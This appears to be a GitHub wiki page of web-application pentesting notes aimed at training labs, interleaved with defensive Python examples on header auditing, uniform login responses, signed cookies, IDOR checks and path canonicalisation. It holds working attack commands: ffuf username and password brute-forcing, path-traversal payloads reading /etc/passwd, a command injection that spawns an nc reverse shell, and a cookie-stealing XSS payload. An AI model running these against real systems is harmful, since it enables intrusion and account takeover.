WebApplication Hacking - singirikondamani/Noted GitHub Wiki
- Use Gobuster to find hidden website pages (dir mode, as used further down these notes):
gobuster dir -u http://fakebank.thm -w wordlist.txt
- To view a page's source code, open the following in the browser:
view-source:http://www.gsg.com
- To check whether directory listing is enabled, append a directory name such as
/assets
to the end of the URL and see whether the server lists its contents.
- The browser's developer tools (debugger, page source and the Network tab) show each request sent to the server and the response it returns.
Content can be many things: a file, a video, a picture, a backup, a website feature. Content discovery is not about the obvious things we can see on a website; it is about the things that are not immediately presented to us and were not always intended for public access. Examples are pages or portals intended for staff use, older versions of the website, backup files, configuration files and administration panels.
- robots.txt: a file read by web crawlers, in which the developer states which pages may be crawled and which are off limits. Pentesters read it to learn which paths exist and which ones the site owner wanted kept out of search results. View the file at:
http://www.hfhf.com/robots.txt
- Manual Discovery - sitemap.xml: lists every file the website owner wants listed by search engines. It can reveal areas of the site that are harder to navigate to, or old pages the current site no longer links to but which still work behind the scenes. View the file at:
http://www.hfhf.com/sitemap.xml
- Manual Discovery - HTTP headers: responses (and requests) can carry sensitive information, such as the web server software and version or the backend language. View them with:
curl -I url
or in Burp Suite.
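As an added example (not part of these notes), the following script takes the header block that curl -I prints and audits it the way a defender would: it flags headers that disclose the technology stack, hardening headers that are missing, and session cookies set without Secure or HttpOnly. Both responses are constructed samples, not captures from a real host.

```python
# Added example (not from these notes): audit the headers that `curl -I` returns
# for technology disclosure, missing hardening headers and weak cookie flags.
# Both responses below are constructed samples, not captured from a real host.

LEAKY_RESPONSE = """HTTP/1.1 200 OK
Date: Mon, 01 Jan 2024 00:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=abc123; Path=/
"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax
"""

# Headers whose values reveal the software stack (the "sensitive information" above)
DISCLOSURE_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-generator"}
# Hardening headers a production site is expected to send
EXPECTED_HEADERS = {
    "strict-transport-security",
    "content-security-policy",
    "x-content-type-options",
    "x-frame-options",
}


def parse_headers(raw):
    """Parse the response head into {lower-cased name: [values]}; skips the status line."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:
        if not line.strip():
            break  # end of the header block
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def audit_headers(raw):
    """Return a list of findings; an empty list means nothing to report."""
    headers = parse_headers(raw)
    findings = []
    for name in sorted(DISCLOSURE_HEADERS & headers.keys()):
        findings.append(f"discloses technology: {name}: {headers[name][0]}")
    for name in sorted(EXPECTED_HEADERS - headers.keys()):
        findings.append(f"missing hardening header: {name}")
    for cookie in headers.get("set-cookie", []):
        cookie_name = cookie.split("=", 1)[0]
        attrs = {part.strip().split("=", 1)[0].lower() for part in cookie.split(";")[1:]}
        for flag in ("Secure", "HttpOnly"):
            if flag.lower() not in attrs:
                findings.append(f"cookie {cookie_name} lacks {flag}")
    return findings


if __name__ == "__main__":
    for finding in audit_headers(LEAKY_RESPONSE):
        print(finding)
```

Run it against the output of curl -I on a site you are authorised to test; an empty finding list is the goal for the hardened configuration.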
- Other tools:
- Wappalyzer: identifies the technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more.
- Wayback Machine: retrieves older versions of the website.
- Automated Discovery: ffuf, dirb and Gobuster, each run here with the same wordlist:
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.248.83/FUZZ
dirb http://10.10.248.83/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
gobuster dir --url http://10.10.248.83/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
- Why: subdomain enumeration is the process of finding valid subdomains for a domain. We do this to expand our attack surface and discover more potential points of vulnerability. Three methods: brute force, OSINT (Open-Source Intelligence) and virtual hosts.
- SSL/TLS certificates: certificate transparency logs can be used to discover subdomains belonging to a domain. Sites like https://crt.sh and https://ui.ctsearch.entrust.com/ui/ctsearchui offer a searchable database of certificates with current and historical results.
- Search engines: go to Google and use the search term
site:*.tryhackme.com -site:www.tryhackme.com
which should reveal subdomains of tryhackme.com.
- Brute-force DNS: using the tool dnsrecon:
dnsrecon -t brt -d acmeitsupport.thm
(-t selects the enumeration type: std performs a standard DNS query, brt brute-forces subdomains, rvl does a reverse lookup of a given IP range, srv queries SRV (service) records, axfr attempts a zone transfer, tld tests the domain name against other top-level domains (TLDs))
- Automation using Sublist3r:
./sublist3r.py -d acmeitsupport.thm
- Virtual hosts: finds subdomains that are not publicly resolvable by taking names from a wordlist, placing each one in the Host header and watching for a response that differs from the server's default, using ffuf:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.203.8 -mc 200 -fs {size}
(-mc matches by status code; -fs filters out responses of the given size to reduce noise)
- Username enumeration: feed names from a wordlist into the signup form and match on the error the site returns for names that are already taken:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.16.240/customers/signup -mr "username already exists"
(-mr matches responses containing the given string or regex).
- Username and password enumeration: two wordlists, W1 for the valid usernames found above and W2 for passwords, filtering out the 200 responses that a failed login returns:
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.16.240/customers/login -fc 200
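Both ffuf runs above only work because the application answers differently depending on whether a username exists. The following added example (not code from these notes) shows the leaky signup and login handlers beside versions that answer identically for every name, and a responses_differ helper that checks the same thing a fuzzer does. The user store, salt and iteration count are constructed for the demo.

```python
# Added example (not from these notes): the signup and login behaviour that makes the
# ffuf runs above work, beside handlers that answer identically for every username.
import hashlib
import hmac

_SALT = b"constructed-demo-salt"   # constructed; real code uses a per-user random salt
_ITERATIONS = 50_000               # constructed, kept low so the demo runs quickly


def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"alice": _hash("correct horse")}  # constructed user store
_DUMMY_HASH = _hash("placeholder")         # hashed for unknown users so timing stays equal


def signup_leaky(username):
    # The "username already exists" message is exactly what -mr matches on.
    if username in USERS:
        return 400, "username already exists"
    return 200, "account created"


def signup_uniform(username):
    # Same status and body whether or not the name is taken; the real outcome is
    # delivered out of band (e.g. by e-mail), so a wordlist run sees identical responses.
    return 200, "if the details are valid you will receive a confirmation e-mail"


def login_leaky(username, password):
    # Two different failure messages tell the caller which half was right.
    if username not in USERS:
        return 401, "invalid username"
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return 401, "invalid password"
    return 200, "welcome"


def login_uniform(username, password):
    # Always hashes (unknown user -> dummy hash) and returns one generic failure,
    # so neither the message nor the timing depends on whether the user exists.
    stored = USERS.get(username, _DUMMY_HASH)
    matches = hmac.compare_digest(stored, _hash(password))
    if matches and username in USERS:
        return 200, "welcome"
    return 401, "invalid username or password"


def responses_differ(probe, candidates):
    """What a fuzzer is really checking: does the response vary across candidate names?"""
    return len({probe(name) for name in candidates}) > 1


if __name__ == "__main__":
    names = ["alice", "mallory"]
    print("leaky signup enumerable:", responses_differ(signup_leaky, names))
    print("uniform signup enumerable:", responses_differ(signup_uniform, names))
```

The -fc 200 filter in the login run relies on the same property: if every failed login returned the same status and body, and only a genuine success differed, the fuzzer would still find valid credentials but could no longer tell valid usernames apart, which is why rate limiting and lockout must accompany uniform responses.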
- Logic flaw leading to unauthorized access: when the developer uses $_REQUEST in the code, a parameter is accepted from either GET or POST. On a password-reset page this lets the request be modified so that the victim's password-reset link is delivered to the attacker.
- Cookie tampering:
- Plain-text cookies: change the value and see whether it grants access. For example, with Set-Cookie: logged_in=true; Max-Age=3600; Path=/ and Set-Cookie: admin=false; Max-Age=3600; Path=/, try changing the values and observe the result.
- Hashed cookies: sometimes the cookie value is a hash; the original value can sometimes be recovered from it.
- Encoded cookies: encoding looks similar to hashing but is easily reversible.
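As an added example (not from these notes), here is why the plain-text admin=false cookie above is tamperable and what the fix looks like: the server signs the cookie body with an HMAC and refuses any cookie whose MAC no longer matches. The secret key and the cookie values are constructed for the demo; the rewrite_body_keep_mac helper reproduces the tampering from the notes against the signed form so that the rejection can be observed.

```python
# Added example (not from these notes): why plain-text cookies like admin=false can be
# tampered with, and how an HMAC-signed cookie lets the server detect the change.
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # constructed; a real key comes from a secrets store


def is_admin_plaintext(cookie_header):
    """Vulnerable pattern: trust admin=true straight from the Cookie header."""
    pairs = dict(part.strip().split("=", 1) for part in cookie_header.split(";"))
    return pairs.get("admin") == "true"


def sign_cookie(payload, key=SECRET):
    """Encode the payload and append an HMAC-SHA256 over the encoded body."""
    body = base64.urlsafe_b64encode(json.dumps(payload, sort_keys=True).encode()).decode()
    mac = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{mac}"


def verify_cookie(cookie, key=SECRET):
    """Return the payload if the MAC checks out, else None (treat the user as logged out)."""
    body, _, mac = cookie.rpartition(".")
    if not body:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def rewrite_body_keep_mac(cookie, **changes):
    """Simulate the tampering from the notes against the signed form:
    edit a field in the encoded body but reuse the old MAC."""
    body, _, mac = cookie.rpartition(".")
    data = json.loads(base64.urlsafe_b64decode(body))
    data.update(changes)
    new_body = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()
    return f"{new_body}.{mac}"


if __name__ == "__main__":
    cookie = sign_cookie({"user": "bob", "admin": False})
    print("genuine cookie ->", verify_cookie(cookie))
    print("tampered cookie ->", verify_cookie(rewrite_body_keep_mac(cookie, admin=True)))
```

Note that signing only protects integrity: the body is still readable after base64 decoding, which is the "encoded cookie" case above. Anything the client must not see belongs server-side, with the cookie holding only a random session identifier.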
- IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability.
- Identify URLs that use id= or any other account-related reference, change the value and check whether the website is vulnerable to IDOR.
- Finding IDORs in encoded IDs: decode the ID, change it, re-encode it and try the access.
- Finding IDORs in hashed IDs: MD5 is commonly used.
- Finding IDORs in unpredictable IDs: if the ID cannot be recovered with the above methods, an excellent method of IDOR detection is to create two accounts and swap the ID numbers between them.
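The following added example (not code from these notes) shows the root cause behind every variant above: the object is fetched by the identifier the client supplied without checking that the session user owns it. It places the vulnerable lookup beside the fixed one, shows that decoding an encoded ID is not authorization, and runs the two-account swap test from the notes against both. The invoice data and users are constructed.

```python
# Added example (not from these notes): an object lookup with and without an ownership
# check, plus the two-account swap test from the notes run against both.
import base64

INVOICES = {  # constructed sample data: invoice id -> record
    1001: {"owner": "alice", "total": 120},
    1002: {"owner": "bob", "total": 75},
}


class NotFound(Exception):
    """Raised for both 'no such invoice' and 'not yours', so ids cannot be confirmed to exist."""


def get_invoice_idor(current_user, invoice_id):
    # Vulnerable: the id from the URL is used directly; any logged-in user can read any invoice.
    del current_user  # unused, which is exactly the bug
    return INVOICES[invoice_id]


def get_invoice_checked(current_user, invoice_id):
    # Fixed: authorization is decided from the session user, not from anything the client sent.
    record = INVOICES.get(invoice_id)
    if record is None or record["owner"] != current_user:
        raise NotFound(invoice_id)
    return record


def get_invoice_by_token(current_user, token):
    # Encoded ids (base64 here) hide nothing: decode, then authorize exactly as above.
    invoice_id = int(base64.b64decode(token))
    return get_invoice_checked(current_user, invoice_id)


def two_account_test(fetch):
    """The detection method from the notes: two accounts each request the other's id.
    Returns how many cross-account reads succeeded (0 for a correct implementation)."""
    cross_reads = 0
    for user, other_id in (("alice", 1002), ("bob", 1001)):
        try:
            fetch(user, other_id)
            cross_reads += 1
        except (NotFound, KeyError):
            pass
    return cross_reads


if __name__ == "__main__":
    print("cross-account reads, vulnerable:", two_account_test(get_invoice_idor))
    print("cross-account reads, fixed:", two_account_test(get_invoice_checked))
```

Hashing or randomising the identifier (the MD5 and "unpredictable ID" cases) changes only how hard the id is to guess; the ownership check in get_invoice_checked is what actually closes the hole.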
- Path traversal: this attack can be performed with the tool dot-dot-slash.
- Manual exploitation of this vulnerability:
http://webapp.thm/get.php?file=../../../../etc/passwd
(four ../ are used)
- When performing a black-box local file inclusion attack, first give some invalid input; the error message helps in crafting the payload. If the application appends .php to the input, add %00 at the end so the appended extension is ignored (a null-byte trick that only works on old PHP versions):
../../../../etc/passwd%00
- Sometimes filters block specific keywords like /etc/passwd. Bypasses include the current-directory trick, adding /.. or /. to confuse the filter, or doubling the sequence so that a filter which strips ../ only once leaves ../ behind:
....//....//....//etc/passwd
- Try it from the URL when the website blocks or filters the input; the error message is your friend when exploiting this.
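As an added example (not from these notes), the script below shows the two sides of the traversal section: the naive "strip ../ once" filter that the ....// payload is designed to defeat, and a canonical-path check that rejects every payload listed above, including the %00 variant and an absolute path. The document root /srv/files is constructed and does not need to exist.

```python
# Added example (not from these notes): the naive '../' stripping that the ....// payload
# defeats, beside a canonical-path check that rejects every payload in the notes.
import os
from urllib.parse import unquote

BASE_DIR = os.path.realpath("/srv/files")  # constructed document root; need not exist


def naive_filter(user_input):
    """Weak defence: remove '../' once. '....//' becomes '../' after one pass."""
    return user_input.replace("../", "")


def serve_naive(user_input, base_dir=BASE_DIR):
    """Vulnerable: filter, join, and never check that the result is still under base_dir."""
    return os.path.normpath(os.path.join(base_dir, naive_filter(unquote(user_input))))


def resolve_user_path(user_input, base_dir=BASE_DIR):
    """Return the absolute path to serve, or None when the request escapes base_dir."""
    decoded = unquote(user_input)
    if "\x00" in decoded:  # the %00 trick: never let a null byte reach the filesystem API
        return None
    # realpath collapses '..', '.', doubled slashes and symlinks; os.path.join with an
    # absolute user path discards base_dir, which the check below also catches.
    candidate = os.path.realpath(os.path.join(base_dir, decoded))
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None
    return candidate


if __name__ == "__main__":
    for payload in ("../../../../etc/passwd", "../../../../etc/passwd%00",
                    "....//....//....//etc/passwd", "reports/q1.txt"):
        print(f"{payload!r:40} naive -> {serve_naive(payload)}  checked -> {resolve_user_path(payload)}")
```

Against the canonicalising check the doubled payload is harmless: it resolves to a literal (nonexistent) directory named .... inside the root, whereas the naive filter turns it into ../../../etc/passwd and serves /etc/passwd.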
- Remote File Inclusion (RFI):
- Inject the shell command into the search field:
127.0.0.1 && nc -e /bin/sh 127.0.0.1 8888
- Set up the nc listener:
nc -lvnp 8888
- Low level: place this in the URL:
..././..././.././.././.././.././etc/passwd
- Medium level: place this in the URL:
file:///etc/passwd
- XSS (DOM-based) test payload:
<script>alert(document.cookie)</script>
- Tool used for testing: PwnXSS
python3 pwnxss.py -u http://testphp.vulnweb.com
- It shows the possible payloads; copy and paste one into the browser URL to execute the XSS: